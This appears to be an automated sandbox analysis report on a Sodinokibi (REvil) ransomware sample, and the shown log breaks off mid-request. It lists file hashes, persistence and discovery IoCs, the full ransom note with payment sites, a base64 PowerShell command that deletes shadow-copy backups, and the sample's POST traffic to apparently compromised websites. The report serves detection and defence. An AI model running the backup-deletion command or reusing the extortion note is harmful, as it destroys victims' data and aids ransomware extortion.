sodinokibi | 69de11ed75d212a04e1f03206929f339d8a3f20dec5b8047adf5bb4d9e1b27c3

Analysis

max time kernel
137s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20231215-en
resource tags

arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
submitted
02/04/2024, 13:53 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
Size

166KB
MD5

43e9093ffc8dd69985a9ae65b26f5551
SHA1

7b268ff84e824ddcd8b7df3cf9993be012489d01
SHA256

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d
SHA512

118d879750d0456f5b2e31818815ef9465fb40eac24f4784236c626d2a2e753b5a85ec5b2c66a755b10855c9caaf77bd85b6b3d1fc7003fb029cb703ead9037c
SSDEEP

3072:1LFrb30BRtBZZg+i2ayy2RjLTuVyu7CJDgoMT3QG9BEJfMt0H:ZJ0BXScFy2RsQJ8zgG9jt0

Score

10^/10

sodinokibi persistence ransomware

Malware Config

Extracted

Path

C:\Recovery\wpq2m-readme.txt

Family

sodinokibi

Ransom Note

---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension wpq2m. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/884E796F59D57ABB 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/884E796F59D57ABB Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: 2dpDZ78zX2b2dvXF5iWHoEvyOESk/bXR0+DRWfyYP9sTjfX7lLz8rH7blNuZ6mXv vH6FmLTxOMLggPOCcqNqfOGqLw1f+4S7PnDTOjq1a7rNXPjteyeX9QWuXuB2f5vA C+NUE3fpL6CM/x5aqVl0MXFHRQpiPUxQp5cioCcqoJy5PqU8rusNkBTggoAmSsKT TYAUduGYSpd9c9pHJTuMkmYnAenMkloYZw5SRAqg4vrdlc26/CTXEmBcYcWr+ZVF sYJCByfYKdzRqqk4X078F/XHaOFTn1MaDO3ScMBmj+RvP7maOZRtbjPOeXOdxpWg zfI5mZA54ncUVNzGrDXiinC4n4PgVsUPdgJUoZHvnZEGi5oUajoR7tIAxI7a+N8V Fzg+c3EywiANv4Mcq3MBlEhxe97AWq6CacwYzgJSBhFiNbHKMLNfRImihG2mbumV VzsTzYSiw3NBtSNfkt6H8reCduE05B++vS1Erjh/LAPEofN6qURU/Dt7XZiaTCrX ETvkotiJAGGoGW/jHjnPa/ePR6jqXKJjMYVcN7i/mhqgYz2aRv2eG8wDbZ7rVrsX qrlj/0/xqXx+QAU6CqNPN5TvokTMyrtcJtO7uQ/Qu+XR4CsJKXc/+Az+f5QmUB1K RqcLIHddDzUPryWrvxMo0JSiYhH3ibUHijcfX8P9uNB41YU18TVuhaHwSXV31vKB ET8A4YdKQ/6VwCmRaklnSgjuiBEl2eWDEIUV/ZuOIlMZrC2lN6hapy1e63VV+mQW PRD9qK8lVFVS1N/zSg7PjLAjHpFbe5CG9GAHHaePMoyrI/VDsZI3JaOnmKwPRiIG pp3O+aO4BO8I5LqbGAgCeP/WNtqBFVopjwab6De9ihlpsRnn2rGEfZq7Dld+4bGB skm+3dTn8yev3l8RRQeBDBKWXExXJV9g4PnvzhKVP0pduIusmqUz4QfaFQSlorkK TAFK3IIRi0WW6qvfd9CylS6fJJsFAHXKVBI4V6/66Trv7tEYlmgcUAtbdpP9ZnXg I5mcfzvHD7lj8GzTgC9HiYCakai5CPLXH6uNMd+c4/CvJt4NJMMJKj6KpoGwQtWh 1KpTt02NY/q43PKu9nyOyHWncxeMMnU7Ubk4cTxJEo7XtNyLNaxqAg3LRYtwqHVA eUm2JEexb0z4/3WiEgUKnPNdvS3+10ii9IQqS+cdJvXHX8M2NzHYJb51iTDGP8zH ctddrsTd+IyXjKzr0xTCRA== ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!

URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/884E796F59D57ABB

http://decryptor.cc/884E796F59D57ABB

Signatures

Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
ransomware sodinokibi

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\k51299BQXH = "C:\\Users\\Admin\\AppData\\Local\\Temp\\42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe"	42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

Enumerates connected drives 3 TTPs 25 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\J:	42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
File opened (read-only)	\??\K:	42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
File opened (read-only)	\??\O:	42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
File opened (read-only)	\??\F:	42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
File opened (read-only)	\??\E:	42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
File opened (read-only)	\??\L:	42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
File opened (read-only)	\??\U:	42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
File opened (read-only)	\??\V:	42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
File opened (read-only)	\??\X:	42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
File opened (read-only)	\??\G:	42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
File opened (read-only)	\??\P:	42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
File opened (read-only)	\??\Q:	42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
File opened (read-only)	\??\T:	42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
File opened (read-only)	\??\D:	42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
File opened (read-only)	\??\A:	42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
File opened (read-only)	\??\H:	42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
File opened (read-only)	\??\I:	42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
File opened (read-only)	\??\Z:	42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
File opened (read-only)	\??\B:	42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
File opened (read-only)	\??\R:	42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
File opened (read-only)	\??\S:	42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
File opened (read-only)	\??\W:	42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
File opened (read-only)	\??\M:	42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
File opened (read-only)	\??\Y:	42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
File opened (read-only)	\??\N:	42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\js45l8.bmp"	42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

Drops file in Program Files directory 26 IoCs

description	ioc	Process
File opened for modification	\??\c:\program files\AssertRestore.wps	42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
File opened for modification	\??\c:\program files\MountInstall.xla	42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
File created	\??\c:\program files\wpq2m-readme.txt	42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
File created	\??\c:\program files (x86)\wpq2m-readme.txt	42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
File opened for modification	\??\c:\program files\CheckpointTrace.jtx	42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
File opened for modification	\??\c:\program files\CompressBlock.odt	42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
File opened for modification	\??\c:\program files\PushMeasure.wm	42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
File opened for modification	\??\c:\program files\StopEnable.mhtml	42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
File opened for modification	\??\c:\program files\PublishCompare.fon	42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
File opened for modification	\??\c:\program files\RestoreCompress.bmp	42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
File opened for modification	\??\c:\program files\InitializeMerge.wma	42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
File opened for modification	\??\c:\program files\OutComplete.ogg	42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
File opened for modification	\??\c:\program files\NewDebug.snd	42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
File opened for modification	\??\c:\program files\PopDisable.wax	42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
File opened for modification	\??\c:\program files\SkipRestart.tiff	42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
File opened for modification	\??\c:\program files\CompleteBackup.mp3	42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
File opened for modification	\??\c:\program files\EditInstall.au3	42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
File opened for modification	\??\c:\program files\MeasureSuspend.bin	42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
File opened for modification	\??\c:\program files\NewMove.vsdx	42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
File opened for modification	\??\c:\program files\RevokeRename.wdp	42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
File opened for modification	\??\c:\program files\ClearSwitch.otf	42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
File opened for modification	\??\c:\program files\ConvertNew.xltm	42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
File opened for modification	\??\c:\program files\PublishRemove.vdw	42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
File opened for modification	\??\c:\program files\StepImport.easmx	42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
File opened for modification	\??\c:\program files\RedoReceive.xps	42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
File opened for modification	\??\c:\program files\TraceUnpublish.pcx	42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
2472	42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
2472	42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
4824	powershell.exe
4824	powershell.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

description	pid	Process
Token: SeDebugPrivilege	2472	42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
Token: SeDebugPrivilege	4824	powershell.exe
Token: SeBackupPrivilege	220	vssvc.exe
Token: SeRestorePrivilege	220	vssvc.exe
Token: SeAuditPrivilege	220	vssvc.exe

Suspicious use of WriteProcessMemory 2 IoCs

description	pid	Process	procid_target
PID 2472 wrote to memory of 4824	2472	42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe	85
PID 2472 wrote to memory of 4824	2472	42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe	85

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
"C:\Users\Admin\AppData\Local\Temp\42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe"
1⤵
- Adds Run key to start application
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2472
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4824

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:1076

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:220

Network

DNS

183.142.211.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

183.142.211.20.in-addr.arpa

IN PTR

Response
DNS

218.135.221.88.in-addr.arpa

Remote address:

8.8.8.8:53

Request

218.135.221.88.in-addr.arpa

IN PTR

Response

218.135.221.88.in-addr.arpa

IN PTR

a88-221-135-218deploystaticakamaitechnologiescom
DNS

5.181.190.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

5.181.190.20.in-addr.arpa

IN PTR

Response
DNS

95.221.229.192.in-addr.arpa

Remote address:

8.8.8.8:53

Request

95.221.229.192.in-addr.arpa

IN PTR

Response
DNS

196.249.167.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

196.249.167.52.in-addr.arpa

IN PTR

Response
DNS

104.219.191.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

104.219.191.52.in-addr.arpa

IN PTR

Response
DNS

81.171.91.138.in-addr.arpa

Remote address:

8.8.8.8:53

Request

81.171.91.138.in-addr.arpa

IN PTR

Response
DNS

86.23.85.13.in-addr.arpa

Remote address:

8.8.8.8:53

Request

86.23.85.13.in-addr.arpa

IN PTR

Response
DNS

18.31.95.13.in-addr.arpa

Remote address:

8.8.8.8:53

Request

18.31.95.13.in-addr.arpa

IN PTR

Response
DNS

35.34.16.2.in-addr.arpa

Remote address:

8.8.8.8:53

Request

35.34.16.2.in-addr.arpa

IN PTR

Response

35.34.16.2.in-addr.arpa

IN PTR

a2-16-34-35deploystaticakamaitechnologiescom
DNS

mank.de

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

Remote address:

8.8.8.8:53

Request

mank.de

IN A

Response

mank.de

IN A

176.52.247.15
POST

https://mank.de/static/images/ueijdxnirivp.gif

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

Remote address:

176.52.247.15:443

Request

POST /static/images/ueijdxnirivp.gif HTTP/1.1
Cache-Control: no-cache
Connection: close
Pragma: no-cache
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
Content-Length: 928
Host: mank.de

Response

HTTP/1.1 301 Moved Permanently

Date: Tue, 02 Apr 2024 13:54:49 GMT
Server: Apache
X-Redirect-By: WordPress
Upgrade: h2,h2c
Connection: Upgrade, close
Location: https://www.mank.de/static/images/ueijdxnirivp.gif
Cache-Control: max-age=3600
Expires: Tue, 02 Apr 2024 14:54:49 GMT
Referrer-Policy: no-referrer-when-downgrade
Content-Length: 0
Content-Type: text/html; charset=UTF-8
DNS

www.mank.de

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

Remote address:

8.8.8.8:53

Request

www.mank.de

IN A

Response

www.mank.de

IN CNAME

mank.de

mank.de

IN A

176.52.247.15
GET

https://www.mank.de/static/images/ueijdxnirivp.gif

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

Remote address:

176.52.247.15:443

Request

GET /static/images/ueijdxnirivp.gif HTTP/1.1
Cache-Control: no-cache
Connection: close
Pragma: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
Host: www.mank.de

Response

HTTP/1.1 404 Not Found

Date: Tue, 02 Apr 2024 13:54:50 GMT
Server: Apache
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Link: <https://www.mank.de/wp-json/>; rel="https://api.w.org/"
Upgrade: h2,h2c
Connection: Upgrade, close
Referrer-Policy: no-referrer-when-downgrade
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
DNS

15.247.52.176.in-addr.arpa

Remote address:

8.8.8.8:53

Request

15.247.52.176.in-addr.arpa

IN PTR

Response
DNS

work2live.de

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

Remote address:

8.8.8.8:53

Request

work2live.de

IN A

Response

work2live.de

IN A

217.160.0.10
POST

https://work2live.de/uploads/pictures/ta.png

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

Remote address:

217.160.0.10:443

Request

POST /uploads/pictures/ta.png HTTP/1.1
Cache-Control: no-cache
Connection: close
Pragma: no-cache
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
Content-Length: 928
Host: work2live.de
DNS

10.0.160.217.in-addr.arpa

Remote address:

8.8.8.8:53

Request

10.0.160.217.in-addr.arpa

IN PTR

Response

10.0.160.217.in-addr.arpa

IN PTR

217-160-0-10elastic-sslui-rcom
DNS

240.221.184.93.in-addr.arpa

Remote address:

8.8.8.8:53

Request

240.221.184.93.in-addr.arpa

IN PTR

Response
DNS

triggi.de

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

Remote address:

8.8.8.8:53

Request

triggi.de

IN A

Response

triggi.de

IN A

159.69.83.114
POST

https://triggi.de/news/image/pmltlc.gif

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

Remote address:

159.69.83.114:443

Request

POST /news/image/pmltlc.gif HTTP/1.1
Cache-Control: no-cache
Connection: close
Pragma: no-cache
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
Content-Length: 928
Host: triggi.de

Response

HTTP/1.1 404 Not Found

Server: nginx
Date: Tue, 02 Apr 2024 13:55:27 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Disabled-plugins: 0 on 2024-04-02 01:55:27
Strict-Transport-Security: max-age=63072000
DNS

innote.fi

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

Remote address:

8.8.8.8:53

Request

innote.fi

IN A

Response

innote.fi

IN A

18.197.248.23

innote.fi

IN A

52.59.120.70
POST

https://innote.fi/uploads/image/ht.jpg

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

Remote address:

18.197.248.23:443

Request

POST /uploads/image/ht.jpg HTTP/1.1
Cache-Control: no-cache
Connection: close
Pragma: no-cache
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
Content-Length: 928
Host: innote.fi

Response

HTTP/1.1 403 Forbidden

server: nginx
date: Tue, 02 Apr 2024 13:55:27 GMT
content-type: image/jpeg
content-length: 125
connection: close
DNS

iwelt.de

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

Remote address:

8.8.8.8:53

Request

iwelt.de

IN A

Response

iwelt.de

IN A

82.212.215.131
POST

https://iwelt.de/news/assets/ksry.jpg

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

Remote address:

82.212.215.131:443

Request

POST /news/assets/ksry.jpg HTTP/1.1
Cache-Control: no-cache
Connection: close
Pragma: no-cache
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
Content-Length: 928
Host: iwelt.de

Response

HTTP/1.1 301 Moved Permanently

Date: Tue, 02 Apr 2024 13:55:28 GMT
Server: Apache
Location: https://www.iwelt.de/news/assets/ksry.jpg
Content-Length: 308
Connection: close
Content-Type: text/html; charset=iso-8859-1
DNS

www.iwelt.de

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

Remote address:

8.8.8.8:53

Request

www.iwelt.de

IN A

Response

www.iwelt.de

IN A

82.212.215.131
GET

https://www.iwelt.de/news/assets/ksry.jpg

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

Remote address:

82.212.215.131:443

Request

GET /news/assets/ksry.jpg HTTP/1.1
Cache-Control: no-cache
Connection: close
Pragma: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
Host: www.iwelt.de

Response

HTTP/1.1 200 OK

Date: Tue, 02 Apr 2024 13:55:28 GMT
Server: Apache
Strict-Transport-Security: max-age=31536000
X-Frame-Options: SAMEORIGIN
Upgrade: h2
Connection: Upgrade, close
Cache-Control: max-age=3600
Expires: Tue, 02 Apr 2024 14:55:28 GMT
Vary: Accept-Encoding
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Referrer-Policy:
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
DNS

114.83.69.159.in-addr.arpa

Remote address:

8.8.8.8:53

Request

114.83.69.159.in-addr.arpa

IN PTR

Response

114.83.69.159.in-addr.arpa

IN PTR

b97233d myraidboxde
DNS

23.248.197.18.in-addr.arpa

Remote address:

8.8.8.8:53

Request

23.248.197.18.in-addr.arpa

IN PTR

Response

23.248.197.18.in-addr.arpa

IN PTR

eu-staticipmultiscreensitecom
DNS

131.215.212.82.in-addr.arpa

Remote address:

8.8.8.8:53

Request

131.215.212.82.in-addr.arpa

IN PTR

Response

131.215.212.82.in-addr.arpa

IN PTR

sni-web02isitede
DNS

mdacares.com

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

Remote address:

8.8.8.8:53

Request

mdacares.com

IN A

Response

mdacares.com

IN A

74.220.199.6
DNS

celularity.com

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

Remote address:

8.8.8.8:53

Request

celularity.com

IN A

Response

celularity.com

IN A

141.193.213.10

celularity.com

IN A

141.193.213.11
POST

https://celularity.com/uploads/graphic/xqkkog.jpg

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

Remote address:

141.193.213.10:443

Request

POST /uploads/graphic/xqkkog.jpg HTTP/1.1
Cache-Control: no-cache
Connection: close
Pragma: no-cache
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
Content-Length: 928
Host: celularity.com

Response

HTTP/1.1 404 Not Found

Date: Tue, 02 Apr 2024 13:55:32 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
CF-Cache-Status: DYNAMIC
Set-Cookie: __cf_bm=1KXTdBsVEzbqVBY6lm1A89nW90fKVP1377b9.gvUChU-1712066132-1.0.1.1-8D89HZWbbXEyhUN1YrKFkdcsz5P.uA2FSuF5R02reM7Teki0NecFuSqGaVjyGhizGM1PRI_jcZQSNTGA4E4LNw; path=/; expires=Tue, 02-Apr-24 14:25:32 GMT; domain=.celularity.com; HttpOnly; Secure
Server: cloudflare
CF-RAY: 86e1512b58766518-LHR
alt-svc: h3=":443"; ma=86400
DNS

wychowanieprzedszkolne.pl

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

Remote address:

8.8.8.8:53

Request

wychowanieprzedszkolne.pl

IN A

Response

wychowanieprzedszkolne.pl

IN A

185.38.248.97
POST

https://wychowanieprzedszkolne.pl/data/images/utbnsp.gif

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

Remote address:

185.38.248.97:443

Request

POST /data/images/utbnsp.gif HTTP/1.1
Cache-Control: no-cache
Connection: close
Pragma: no-cache
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
Content-Length: 928
Host: wychowanieprzedszkolne.pl

Response

HTTP/1.1 404 Not found

Date: Tue, 02 Apr 2024 13:55:32 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Upgrade: h2,h2c
Connection: keep-alive, close
Vary: Accept-Encoding,User-Agent
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
DNS

bildungsunderlebnis.haus

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

Remote address:

8.8.8.8:53

Request

bildungsunderlebnis.haus

IN A

Response

bildungsunderlebnis.haus

IN A

5.35.226.24
POST

https://bildungsunderlebnis.haus/include/tmp/rguxep.gif

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

Remote address:

5.35.226.24:443

Request

POST /include/tmp/rguxep.gif HTTP/1.1
Cache-Control: no-cache
Connection: close
Pragma: no-cache
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
Content-Length: 928
Host: bildungsunderlebnis.haus

Response

HTTP/1.1 404 Not Found

Date: Tue, 02 Apr 2024 13:55:33 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Language: en
Expires: Tue, 02 Apr 2024 13:55:33 GMT
DNS

10.213.193.141.in-addr.arpa

Remote address:

8.8.8.8:53

Request

10.213.193.141.in-addr.arpa

IN PTR

Response
DNS

urmasiimariiuniri.ro

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

Remote address:

8.8.8.8:53

Request

urmasiimariiuniri.ro

IN A

Response

urmasiimariiuniri.ro

IN A

81.181.102.24
DNS

urmasiimariiuniri.ro

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

Remote address:

8.8.8.8:53

Request

urmasiimariiuniri.ro

IN A

Response

urmasiimariiuniri.ro

IN A

81.181.102.24
DNS

97.248.38.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

97.248.38.185.in-addr.arpa

IN PTR

Response

97.248.38.185.in-addr.arpa

IN PTR

bogdanhostinghousepl
DNS

97.248.38.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

97.248.38.185.in-addr.arpa

IN PTR

Response

97.248.38.185.in-addr.arpa

IN PTR

bogdanhostinghousepl
DNS

23.236.111.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

23.236.111.52.in-addr.arpa

IN PTR

Response
DNS

24.226.35.5.in-addr.arpa

Remote address:

8.8.8.8:53

Request

24.226.35.5.in-addr.arpa

IN PTR

Response

24.226.35.5.in-addr.arpa

IN PTR

wp255webpack hosteuropede
DNS

devlaur.com

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

Remote address:

8.8.8.8:53

Request

devlaur.com

IN A

Response

devlaur.com

IN A

3.33.130.190

devlaur.com

IN A

15.197.148.33
POST

https://devlaur.com/data/pics/or.gif

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

Remote address:

3.33.130.190:443

Request

